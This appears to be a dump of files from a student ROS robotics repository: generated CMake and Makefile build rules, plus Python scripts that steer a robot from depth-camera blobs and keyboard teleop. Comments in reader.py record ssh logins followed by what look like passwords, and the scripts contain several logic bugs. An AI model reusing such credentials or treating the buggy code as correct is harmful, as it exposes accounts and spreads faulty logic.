NAME_WE)\nadd_dependencies(basic_teleop_generate_messages_eus _basic_teleop_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(basic_teleop_geneus)\nadd_dependencies(basic_teleop_geneus basic_teleop_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS basic_teleop_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n_generate_msg_lisp(basic_teleop\n \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/basic_teleop\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(basic_teleop\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/basic_teleop\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(basic_teleop_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(basic_teleop_generate_messages basic_teleop_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" NAME_WE)\nadd_dependencies(basic_teleop_generate_messages_lisp _basic_teleop_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(basic_teleop_genlisp)\nadd_dependencies(basic_teleop_genlisp basic_teleop_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS basic_teleop_generate_messages_lisp)\n\n### Section generating for lang: genpy\n### Generating Messages\n_generate_msg_py(basic_teleop\n \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/basic_teleop\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(basic_teleop\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/basic_teleop\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(basic_teleop_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(basic_teleop_generate_messages basic_teleop_generate_messages_py)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" NAME_WE)\nadd_dependencies(basic_teleop_generate_messages_py _basic_teleop_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(basic_teleop_genpy)\nadd_dependencies(basic_teleop_genpy basic_teleop_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS basic_teleop_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/basic_teleop)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/basic_teleop\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(basic_teleop_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\nif(TARGET sensor_msgs_generate_messages_cpp)\n add_dependencies(basic_teleop_generate_messages_cpp sensor_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/basic_teleop)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/basic_teleop\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(basic_teleop_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\nif(TARGET sensor_msgs_generate_messages_eus)\n add_dependencies(basic_teleop_generate_messages_eus sensor_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/basic_teleop)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/basic_teleop\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(basic_teleop_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\nif(TARGET sensor_msgs_generate_messages_lisp)\n add_dependencies(basic_teleop_generate_messages_lisp sensor_msgs_generate_messages_lisp)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/basic_teleop)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/basic_teleop\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/basic_teleop\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(basic_teleop_generate_messages_py std_msgs_generate_messages_py)\nendif()\nif(TARGET sensor_msgs_generate_messages_py)\n add_dependencies(basic_teleop_generate_messages_py sensor_msgs_generate_messages_py)\nendif()\n"
},
{
"alpha_fraction": 0.602342426776886,
"alphanum_fraction": 0.6276259422302246,
"avg_line_length": 27.162303924560547,
"blob_id": "a76ea111e9206255b81e272846bb4ae91337ebb4",
"content_id": "20e847479a4bad55ba2282beb5afb6e7b4a10c26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5379,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 191,
"path": "/src/basic_teleop/scripts/reader.py",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n#ssh [email protected] - robo\n#ssh [email protected] - becker1a\n\nimport rospy\nimport time\nimport numpy\n\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import *\nfrom basic_teleop.msg import *\n\nclass BBox(object):\n \n def __init__(self, topX, topY, botX, botY):\n\tself.topX = topX\n\tself.topY = topY\n\tself.botX = botX\n\tself.botY = botY\n\n def __str__(self):\n\treturn \"Top corner is {0}, {1}.\\n Bottom corner is {2}, {3}.\\n center is {4}.\".format(self.topX, self.topY, self.botX, self.botY, self.getCenter())\n\n def getCenter(self):\n\treturn [(self.botX + (self.botX - self.topX)//2), (self.botY + (self.botY - self.topY)//2)]\n\n def getArea(self):\n\treturn (self.botX - self.topX) * (self.botY - self.topY)\n\nclass DepthGrid(object):\n\n def __init__(self, data, width, height):\n\tnormalized = numpy.fromstring(data, numpy.uint16)\n #grid = []\n\tgrid = {} \t\n\tcurheight = 0\n \tcurwidth = 0\n \trawPos = 0\n \twhile (curheight < height):\n\t #row = []\n\t while (curwidth < width):\n #row.append(normalized[rawPos])\n\t\tgrid[(curwidth, curheight)] = normalized[rawPos]\n \trawPos += 1\n \tcurwidth += 1\n\t #grid.append(row)\n\t curheight += 1\n\t curwidth = 0\n \tself.depths = grid\n\tself.width = width\n\tself.height = height\n\n def refresh(self, data):\n\tnormalized = numpy.fromstring(data, numpy.uint16)\n\tcurheight = 0\n\tcurwidth = 0\n\trawPos = 0\n\twhile (curheight < self.height): \n\t while (curwidth < curwidth):\n\t\tself.depths[(curwidth, curheight)] = normalized[rawPos]\n\t\trawPos += 1\n\t\tcurwidth += 1\n\t curheight += 1\n curwidth = 0\n\n def getXY(self, x, y):\n\treturn self.depths[(x, y)]#self.depths[y][x]\n\nclass DepthArray(object):\n\n def __init__(self, data, width, height):\n\tself.depths = numpy.fromstring(data, numpy.uint16)\n\tself.width = width\n\tself.height = height\n\n def getXY(self, x, y):\n\treturn self.depths[(y * self.width) + x]\n\nhistoryOfCenter=[]\n\ndef callback(data):\n rospy.loginfo(rospy.get_caller_id())\n #print data.height\n #print data.width\n #print len(data.data)\n #print data.encoding\n #print data.step\n\n frame = DepthArray(data.data, data.width, data.height)\n\n directTowardsSuitableBlob(frame)\n\ndef directTowardsClosestPoint(grid):\n least = 99999999\n unacceptablyClose = 0\n leastX = 0\n leastY = 0\n for x in range (0, len(grid[0])):\n\tfor y in range (0, len(grid)):\n if ((grid.getXY(x, y) <= least) and (grid.getXY(x, y) !=0)):\n\t\tleast = grid.getXY(x, y)\n\t\tleastX = x\n\t\tleastY = y\n if (leastX <= 120):\n\tprint \"left\"\n pub.publish(Move(\"ccw\", 1))\n elif (leastX >= 200):\n\tprint \"right\"\n\tpub.publish(Move(\"cw\", 1))\n else:\n\tprint \"stop\"\n\tpub.publish(Move(\"fwd\", 1))\n\ndef findSimpleBBoxIncluding(grid, x, y):\n standard = grid.getXY(x, y)\n topX= x\n bottomX = x\n topY = y\n bottomY = y\n while ((grid.getXY(bottomX, bottomY) < (standard + 10)) and (grid.getXY(bottomX, bottomY) > (standard - 10)) and (bottomX < grid.width - 1)):\n\tstandard = grid.getXY(bottomX, bottomY)\n\tbottomX += 1\n while ((grid.getXY(bottomX, bottomY) < (standard + 10)) and (grid.getXY(bottomX, bottomY) > (standard - 10)) and (bottomY < grid.height - 1)):\n\tstandard = grid.getXY(bottomX, bottomY)\n\tbottomY += 1\n \n standard = grid.getXY(x, y)\n\n while ((grid.getXY(topX, topY) < (standard + 10)) and (grid.getXY(topX, topY) > (standard - 10)) and (topX > 0)):\n\tstandard = grid.getXY(topX, topY)\n\ttopX -= 1\n while ((grid.getXY(topX, topY) < (standard + 10)) and (grid.getXY(topX, topY) > (standard - 10)) and (topY > 0)):\n\tstandard = grid.getXY(topX, topY)\n\ttopY -= 1\n return BBox(topX, topY, bottomX, bottomY)\n\ndef findSuitableBBox(grid):\n output = BBox(0, 0, 0, 0)\n most = 0\n least = 99999999\n leastX = 0\n leastY = 0\n attemptCount = 0\n while(output.getArea() < 50):\n for x in range (0, grid.width):\n\t for y in range (0, grid.height):\n if ((grid.getXY(x, y) <= least) and (grid.getXY(x, y) > most)):\n\t\t least = grid.getXY(x, y)\n\t\t leastX = x\n\t\t leastY = y\n most = least\n\toutput = findSimpleBBoxIncluding(grid, leastX, leastY)\n\tleast = 99999999\n\tattemptCount += 1\n if (attemptCount > 4):\n\t break\t\n return output\n\ndef directTowardsSuitableBlob(grid):\n blob = findSuitableBBox(grid)\n blobCenter = blob.getCenter()\n if (blobCenter[0] <= 140):\n\tprint \"Blob found to the left\"\n pub.publish(Move(\"ccw\", 1))\n elif (blobCenter[0] >= 180):\n\tprint \"Blob found to the right\"\n\tpub.publish(Move(\"cw\", 1))\n else:\n\tprint \"Blob found in center; stop\"\n\tpub.publish(Move(\"fwd\", 1))\n\n\ndef listener():\n # In ROS, nodes are uniquely named. If two nodes with the same\n # node are launched, the previous one is kicked off. The\n # anonymous=True flag means that rospy will choose a unique\n # name for our 'listener' node so that multiple listeners can\n # run simultaneously.\n rospy.init_node('driver', anonymous=True)\n #rospy.Subscriber(\"movement\", Move, callback)\n print \"ready to listen + learn!\"\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n print historyOfCenter\n\nsub = rospy.Subscriber(\"/openni2_camera/depth/image_raw_drop\", sensor_msgs.msg.Image, callback)\npub = rospy.Publisher('movement', Move, queue_size=10)\n\nif __name__ == '__main__':\n listener()\n"
},
{
"alpha_fraction": 0.5568862557411194,
"alphanum_fraction": 0.5678642988204956,
"avg_line_length": 25.36842155456543,
"blob_id": "e2ee74642f9cae97af15d023b63afe3232f08b7d",
"content_id": "7e285d3a562abab682517edf2ed62d505a107742",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1002,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 38,
"path": "/src/basic_teleop/scripts/keyop.py",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nimport tty\nimport sys\nfrom std_msgs.msg import String\nfrom basic_teleop.msg import *\n\ndef talker():\n fd = sys.stdin.fileno()\n tty.setraw(fd)\n pub = rospy.Publisher('movement', Move, queue_size=10)\n rospy.init_node('director', anonymous=True)\n rate = rospy.Rate(10) # 10hz\n print \"ready to read\"\n while not rospy.is_shutdown():\n key_str = sys.stdin.read(1)\n\ttopic = Move()\n if key_str == 'w':\n\t topic = Move(\"fwd\", 1)\n elif key_str == 's':\n topic = Move(\"bwd\", 1)\n elif key_str == 'a':\n topic = Move(\"ccw\", 1)\n elif key_str == 'd':\n topic = Move(\"cw\", 1)\n elif key_str == 'q':\n\t quit()\n rospy.loginfo(topic)\n pub.publish(topic)\n rate.sleep()\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings)\n\nif __name__ == '__main__':\n try:\n talker()\n except rospy.ROSInterruptException:\n pass\n"
},
{
"alpha_fraction": 0.6887755393981934,
"alphanum_fraction": 0.690430223941803,
"avg_line_length": 41.20271682739258,
"blob_id": "3ff7a3d40436496eaca3dea397428ffae4ff6c02",
"content_id": "51ea58b436f686e1d4c52bd561f0d8597d18abc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 43512,
"license_type": "no_license",
"max_line_length": 216,
"num_lines": 1031,
"path": "/build/Makefile",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 2.8\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n.PHONY : default_target\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n# A target that is always out of date.\ncmake_force:\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/will/catkin_ws/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/will/catkin_ws/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running interactive CMake command-line interface...\"\n\t/usr/bin/cmake -i .\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n.PHONY : edit_cache/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n.PHONY : install/local/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n.PHONY : install/strip/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n.PHONY : list_install_components/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n.PHONY : test/fast\n\n# The main all target\nall: cmake_check_build_system\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/will/catkin_ws/build/CMakeFiles /home/will/catkin_ws/build/CMakeFiles/progress.marks\n\t$(MAKE) -f CMakeFiles/Makefile2 all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/will/catkin_ws/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\t$(MAKE) -f CMakeFiles/Makefile2 clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\t$(MAKE) -f CMakeFiles/Makefile2 preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\t$(MAKE) -f CMakeFiles/Makefile2 preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\t$(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n#=============================================================================\n# Target rules for targets named clean_test_results\n\n# Build rule for target.\nclean_test_results: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 clean_test_results\n.PHONY : clean_test_results\n\n# fast build rule for target.\nclean_test_results/fast:\n\t$(MAKE) -f CMakeFiles/clean_test_results.dir/build.make CMakeFiles/clean_test_results.dir/build\n.PHONY : clean_test_results/fast\n\n#=============================================================================\n# Target rules for targets named download_extra_data\n\n# Build rule for target.\ndownload_extra_data: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 download_extra_data\n.PHONY : download_extra_data\n\n# fast build rule for target.\ndownload_extra_data/fast:\n\t$(MAKE) -f CMakeFiles/download_extra_data.dir/build.make CMakeFiles/download_extra_data.dir/build\n.PHONY : download_extra_data/fast\n\n#=============================================================================\n# Target rules for targets named doxygen\n\n# Build rule for target.\ndoxygen: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 doxygen\n.PHONY : doxygen\n\n# fast build rule for target.\ndoxygen/fast:\n\t$(MAKE) -f CMakeFiles/doxygen.dir/build.make CMakeFiles/doxygen.dir/build\n.PHONY : doxygen/fast\n\n#=============================================================================\n# Target rules for targets named run_tests\n\n# Build rule for target.\nrun_tests: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 run_tests\n.PHONY : run_tests\n\n# fast build rule for target.\nrun_tests/fast:\n\t$(MAKE) -f CMakeFiles/run_tests.dir/build.make CMakeFiles/run_tests.dir/build\n.PHONY : run_tests/fast\n\n#=============================================================================\n# Target rules for targets named tests\n\n# Build rule for target.\ntests: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 tests\n.PHONY : tests\n\n# fast build rule for target.\ntests/fast:\n\t$(MAKE) -f CMakeFiles/tests.dir/build.make CMakeFiles/tests.dir/build\n.PHONY : tests/fast\n\n#=============================================================================\n# Target rules for targets named gtest\n\n# Build rule for target.\ngtest: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 gtest\n.PHONY : gtest\n\n# fast build rule for target.\ngtest/fast:\n\t$(MAKE) -f gtest/CMakeFiles/gtest.dir/build.make gtest/CMakeFiles/gtest.dir/build\n.PHONY : gtest/fast\n\n#=============================================================================\n# Target rules for targets named gtest_main\n\n# Build rule for target.\ngtest_main: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 gtest_main\n.PHONY : gtest_main\n\n# fast build rule for target.\ngtest_main/fast:\n\t$(MAKE) -f gtest/CMakeFiles/gtest_main.dir/build.make gtest/CMakeFiles/gtest_main.dir/build\n.PHONY : gtest_main/fast\n\n#=============================================================================\n# Target rules for targets named _basic_teleop_generate_messages_check_deps_Move\n\n# Build rule for target.\n_basic_teleop_generate_messages_check_deps_Move: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 _basic_teleop_generate_messages_check_deps_Move\n.PHONY : _basic_teleop_generate_messages_check_deps_Move\n\n# fast build rule for target.\n_basic_teleop_generate_messages_check_deps_Move/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/_basic_teleop_generate_messages_check_deps_Move.dir/build.make basic_teleop/CMakeFiles/_basic_teleop_generate_messages_check_deps_Move.dir/build\n.PHONY : _basic_teleop_generate_messages_check_deps_Move/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_gencpp\n\n# Build rule for target.\nbasic_teleop_gencpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_gencpp\n.PHONY : basic_teleop_gencpp\n\n# fast build rule for target.\nbasic_teleop_gencpp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_gencpp.dir/build.make basic_teleop/CMakeFiles/basic_teleop_gencpp.dir/build\n.PHONY : basic_teleop_gencpp/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_generate_messages\n\n# Build rule for target.\nbasic_teleop_generate_messages: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_generate_messages\n.PHONY : basic_teleop_generate_messages\n\n# fast build rule for target.\nbasic_teleop_generate_messages/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_generate_messages.dir/build.make basic_teleop/CMakeFiles/basic_teleop_generate_messages.dir/build\n.PHONY : basic_teleop_generate_messages/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_generate_messages_cpp\n\n# Build rule for target.\nbasic_teleop_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_generate_messages_cpp\n.PHONY : basic_teleop_generate_messages_cpp\n\n# fast build rule for target.\nbasic_teleop_generate_messages_cpp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_generate_messages_cpp.dir/build.make basic_teleop/CMakeFiles/basic_teleop_generate_messages_cpp.dir/build\n.PHONY : basic_teleop_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_generate_messages_eus\n\n# Build rule for target.\nbasic_teleop_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_generate_messages_eus\n.PHONY : basic_teleop_generate_messages_eus\n\n# fast build rule for target.\nbasic_teleop_generate_messages_eus/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_generate_messages_eus.dir/build.make basic_teleop/CMakeFiles/basic_teleop_generate_messages_eus.dir/build\n.PHONY : basic_teleop_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_generate_messages_lisp\n\n# Build rule for target.\nbasic_teleop_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_generate_messages_lisp\n.PHONY : basic_teleop_generate_messages_lisp\n\n# fast build rule for target.\nbasic_teleop_generate_messages_lisp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_generate_messages_lisp.dir/build.make basic_teleop/CMakeFiles/basic_teleop_generate_messages_lisp.dir/build\n.PHONY : basic_teleop_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_generate_messages_py\n\n# Build rule for target.\nbasic_teleop_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_generate_messages_py\n.PHONY : basic_teleop_generate_messages_py\n\n# fast build rule for target.\nbasic_teleop_generate_messages_py/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_generate_messages_py.dir/build.make basic_teleop/CMakeFiles/basic_teleop_generate_messages_py.dir/build\n.PHONY : basic_teleop_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_geneus\n\n# Build rule for target.\nbasic_teleop_geneus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_geneus\n.PHONY : basic_teleop_geneus\n\n# fast build rule for target.\nbasic_teleop_geneus/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_geneus.dir/build.make basic_teleop/CMakeFiles/basic_teleop_geneus.dir/build\n.PHONY : basic_teleop_geneus/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_genlisp\n\n# Build rule for target.\nbasic_teleop_genlisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_genlisp\n.PHONY : basic_teleop_genlisp\n\n# fast build rule for target.\nbasic_teleop_genlisp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_genlisp.dir/build.make basic_teleop/CMakeFiles/basic_teleop_genlisp.dir/build\n.PHONY : basic_teleop_genlisp/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_genpy\n\n# Build rule for target.\nbasic_teleop_genpy: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_genpy\n.PHONY : basic_teleop_genpy\n\n# fast build rule for target.\nbasic_teleop_genpy/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_genpy.dir/build.make basic_teleop/CMakeFiles/basic_teleop_genpy.dir/build\n.PHONY : basic_teleop_genpy/fast\n\n#=============================================================================\n# Target rules for targets named depth_stream_stabilizer\n\n# Build rule for target.\ndepth_stream_stabilizer: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 depth_stream_stabilizer\n.PHONY : depth_stream_stabilizer\n\n# fast build rule for target.\ndepth_stream_stabilizer/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/build.make basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/build\n.PHONY : depth_stream_stabilizer/fast\n\n#=============================================================================\n# Target rules for targets named geometry_msgs_generate_messages_cpp\n\n# Build rule for target.\ngeometry_msgs_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 geometry_msgs_generate_messages_cpp\n.PHONY : geometry_msgs_generate_messages_cpp\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_cpp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/build.make basic_teleop/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/build\n.PHONY : geometry_msgs_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named geometry_msgs_generate_messages_eus\n\n# Build rule for target.\ngeometry_msgs_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 geometry_msgs_generate_messages_eus\n.PHONY : geometry_msgs_generate_messages_eus\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_eus/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/geometry_msgs_generate_messages_eus.dir/build.make basic_teleop/CMakeFiles/geometry_msgs_generate_messages_eus.dir/build\n.PHONY : geometry_msgs_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named geometry_msgs_generate_messages_lisp\n\n# Build rule for target.\ngeometry_msgs_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 geometry_msgs_generate_messages_lisp\n.PHONY : geometry_msgs_generate_messages_lisp\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_lisp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/build.make basic_teleop/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/build\n.PHONY : geometry_msgs_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named geometry_msgs_generate_messages_py\n\n# Build rule for target.\ngeometry_msgs_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 geometry_msgs_generate_messages_py\n.PHONY : geometry_msgs_generate_messages_py\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_py/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/geometry_msgs_generate_messages_py.dir/build.make basic_teleop/CMakeFiles/geometry_msgs_generate_messages_py.dir/build\n.PHONY : geometry_msgs_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named predictive_director\n\n# Build rule for target.\npredictive_director: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 predictive_director\n.PHONY : predictive_director\n\n# fast build rule for target.\npredictive_director/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/predictive_director.dir/build.make basic_teleop/CMakeFiles/predictive_director.dir/build\n.PHONY : 